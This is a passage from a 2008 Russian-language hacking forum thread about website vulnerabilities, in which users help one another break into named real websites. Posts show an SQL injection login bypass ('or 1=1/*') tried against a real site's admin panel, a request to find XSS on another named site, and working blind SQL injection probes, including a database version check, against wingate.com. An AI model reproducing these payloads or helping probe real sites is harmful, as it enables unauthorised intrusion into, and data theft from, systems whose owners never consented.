ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1171  
Старый 11.03.2008, 22:01
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Скажите что такое выдает сканер NRG что за уязвимости такие или что это?
Найдено: http://XXX.kz/?PageServices
Найдено: http://XXX.kz/?wp-cs-dump
Найдено: http://XXX.kz/?wp-html-rend
Найдено: http://XXX.kz/?wp-stop-ver
Найдено: http://XXX.kz/?wp-uncheckout
Найдено: http://XXX.kz/?wp-usr-prop
Найдено: http://XXX.kz/?wp-ver-diff
Найдено: http://XXX.kz/?wp-verify-link
Найдено: http://XXX.kz/?wp-ver-info

перехожу по этим ссылкам ни чего не происходит
 
Ответить с цитированием

  #1172  
Старый 11.03.2008, 23:09
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://agrealt.ru/admin/
тут в админке sql я так понял что пароль пустое поле а login какой? что то там запросы не составляются или я что то не правильно делаю
 
Ответить с цитированием

  #1173  
Старый 11.03.2008, 23:20
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Table 'realto_base.users' doesn't exist
=\
__________________
..
 
Ответить с цитированием

  #1174  
Старый 12.03.2008, 01:18
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

ага

SELECT user_id FROM realto_base.users WHERE LOWER(user_login)="1" or 1=1/*" AND LOWER(user_pwd)="c1562365960602e0b66d39995ec882cf" ;
Table 'realto_base.users' doesn't exist

сталобыть кто-то похерил админку, или админы кривые
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #1175  
Старый 12.03.2008, 17:44
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Вем спасибо всем плюсую)))

ЗЫ: думал что туплю
 
Ответить с цитированием

  #1176  
Старый 12.03.2008, 17:49
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Помогите разобраться есть ли тут пассивная XSS или нет, что ни пробую не получается
http://nkregion.kz/index.php?IDAdmin=test
 
Ответить с цитированием

  #1177  
Старый 12.03.2008, 18:12
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079

Репутация: 137
По умолчанию

Цитата:
Помогите разобраться есть ли тут пассивная XSS или нет, что ни пробую не получается
http://nkregion.kz/index.php?IDAdmin=test
Цитата:
Error!
CuteNews has detected that...
CuteNews там, врядли найдешь ХСС просто так.
Багтраки почитай лучше, или в сорцы лезь.
 
Ответить с цитированием

  #1178  
Старый 12.03.2008, 18:43
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию

[Code]http://www.wingate.com/news.php?id=50'[/СODE]
вроде есть скуль запросы типа выдают одну и ту же страницу
Код:
http://www.wingate.com/news.php?id=50-1
http://www.wingate.com/news.php?id=49
а с подзапросами что то странное твориться не одни не выполняться O_o
 
Ответить с цитированием

  #1179  
Старый 12.03.2008, 18:51
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

как не выполняются?

http://www.wingate.com/news.php?id=49%20and%20(select%201)=1

5ый мускул
http://www.wingate.com/news.php?id=49%20and%20substring(version(),1,1)=5
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #1180  
Старый 12.03.2008, 18:53
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Цитата:
Сообщение от truelamer  
Скажите что такое выдает сканер NRG что за уязвимости такие или что это?
Найдено: http://XXX.kz/?PageServices
Найдено: http://XXX.kz/?wp-cs-dump
Найдено: http://XXX.kz/?wp-html-rend
Найдено: http://XXX.kz/?wp-stop-ver
Найдено: http://XXX.kz/?wp-uncheckout
Найдено: http://XXX.kz/?wp-usr-prop
Найдено: http://XXX.kz/?wp-ver-diff
Найдено: http://XXX.kz/?wp-verify-link
Найдено: http://XXX.kz/?wp-ver-info

перехожу по этим ссылкам ни чего не происходит
это старые серверные уязвимости, не встречаются уже пару лет. даже не уязвимости, а фичи, показывающую инфу о серваке
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ